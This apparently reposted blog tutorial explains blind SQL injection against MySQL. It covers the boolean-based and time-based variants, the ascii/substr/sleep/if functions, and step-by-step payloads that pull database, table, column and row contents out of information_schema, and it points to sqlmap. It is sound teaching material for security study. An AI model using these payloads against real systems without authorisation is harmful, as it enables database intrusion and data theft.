SQL injection: blind injection

What blind injection is

Blind injection is the situation where the server echoes neither the result of the injected query nor any SQL error message back to the attacker.
Without that error echo the attacker loses a very important source of "debugging information" and has to infer the result of each query from a side channel instead, such as whether the page looks normal or how long it takes to respond.

Types of blind injection

1. Boolean-based blind
The page behaves in one of two ways, True or False, depending on whether the injected condition holds, so every request answers one yes/no question. No error message is shown at any point.

2. Time-based blind
The page looks the same whatever you inject, so it effectively only ever returns one value, True. By adding a time-delay function to the injected condition you can still judge whether the condition was true, from the difference in how long the page takes to respond.

Functions needed for blind injection

length(str) returns the length of the string
substr(str, pos, len) extracts a substring (positions count from 1, so substr(str, 1, 1) is the first character)
ascii(str) returns the ASCII code of the first character of str (turns a character into a number you can compare against)
sleep(n) suspends the query for n seconds
if(expr1, expr2, expr3) evaluates expr1; if it is true the result is expr2, otherwise expr3

Injection steps

1. Guess the length of the database name
id=1' and (length(database()))>n -- +

2. Guess the database name one character at a time
and (ascii(substr(database(),1,1)))=115 -- +    returns the normal page, so the first character of the database name is s (ASCII 115)

3. Guess the table name
and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)))=101 -- +    returns the normal page, so the first character of the first table name in the current database is e (ASCII 101)

4. Guess the column name
and (ascii(substr((select column_name from information_schema.columns where table_name='zkaq' limit 0,1),1,1)))=102 -- +    returns the normal page, so the first character of the first column name in table zkaq is f (ASCII 102)

5. Guess the data
and (ascii(substr((select zKaQ from zkaq limit 4,1),1,1)))=122 -- +    returns the normal page, so the first character of the fifth row (limit 4,1) of column zKaQ is z (ASCII 122)

In every step, advance the position in substr() (substr(...,2,1), substr(...,3,1), ...) to recover the next character, and advance the limit offset to move on to the next table, column or row. The trailing `-- ` comments out the rest of the original query; the `+` is the URL-encoded space that MySQL's `-- ` comment syntax requires.

Using tools

sqlmap

Download: https://github.com/sqlmapproject/sqlmap
After downloading, extract it and add the directory to your PATH environment variable; you can then run it directly from cmd.

Kali Linux also ships with sqlmap.

Time-based (delay) injection

and if(ascii(substr(database(),1,1))>120,0,sleep(10)) -- +
With this payload, if the ASCII code of the first character of the database name is greater than 120, if() returns 0 at once and the page loads at its normal speed; otherwise sleep(10) runs and the page takes about 10 s longer to load. Note that with the arguments in this order the delay signals a FALSE condition; swap the 0 and the sleep(10) if you want the delay to mean the condition is true. Since sleep() itself returns 0, if() evaluates to 0 either way, so the page content is identical in both cases and only the response time leaks information.


Source: www.cnblogs.com/yanlzy/p/11884302.html